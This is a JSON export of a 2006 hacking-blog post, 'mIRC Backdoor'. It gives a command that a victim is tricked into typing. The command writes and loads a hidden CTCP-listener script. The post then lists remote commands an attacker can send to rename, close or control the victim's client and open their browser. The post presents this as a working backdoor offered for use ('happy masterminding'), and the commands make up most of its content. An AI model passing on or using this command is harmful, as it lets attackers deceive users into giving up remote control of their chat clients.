{"id":71,"date":"2006-02-24T22:16:46","date_gmt":"2006-02-24T22:16:46","guid":{"rendered":"https:\/\/www.darknet.org.uk\/2006\/02\/mirc-backdoor\/"},"modified":"2010-06-21T17:50:16","modified_gmt":"2010-06-21T16:50:16","slug":"mirc-backdoor","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2006\/02\/mirc-backdoor\/","title":{"rendered":"mIRC Backdoor"},"content":{"rendered":"

<\/p>\n

Well it’s not really a backdoor… but we can consider it one…<\/p>\n

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:<\/p>\n

\n

\/\/.write -c mirc.dll ctcp 1:*:*:$1- | \/.load -rs mirc.dll<\/p>\n<\/blockquote>\n

The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….<\/p>\n

After the “victim” executes this command we can control it by introducing one of the following lines:<\/p>\n

\n

{ this is a comment }<\/p>\n

\/ctcp victims_nick \/.nick lamer { changes the nickname of the victim to lamer }<\/p>\n

\/ctcp victims_nick \/.exit { closes the victims mIRC }<\/p>\n

\/ctcp victims_nick \/.run www.black2white.as.ro
\n{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }<\/p>\n<\/p>\n

\/ctcp victims_nick \/.any_valid_irc_command<\/p>\n<\/blockquote>\n

So happy “masterminding”….<\/p>\n

<\/p>\n

More IRC Commands: http:\/\/www.hackthissite.org\/pages\/irc\/reference.php<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Well it’s not really a backdoor… but we can consider it one… Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via […]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":"","footnotes":""},"categories":[1],"tags":[127,115,134],"featured_image_src":null,"featured_image_src_square":null,"author_info":{"display_name":"backbone","author_link":"https:\/\/www.darknet.org.uk\/author\/backbone\/"},"_links":{"self":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/posts\/71"}],"collection":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":0,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.darknet.org.uk\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}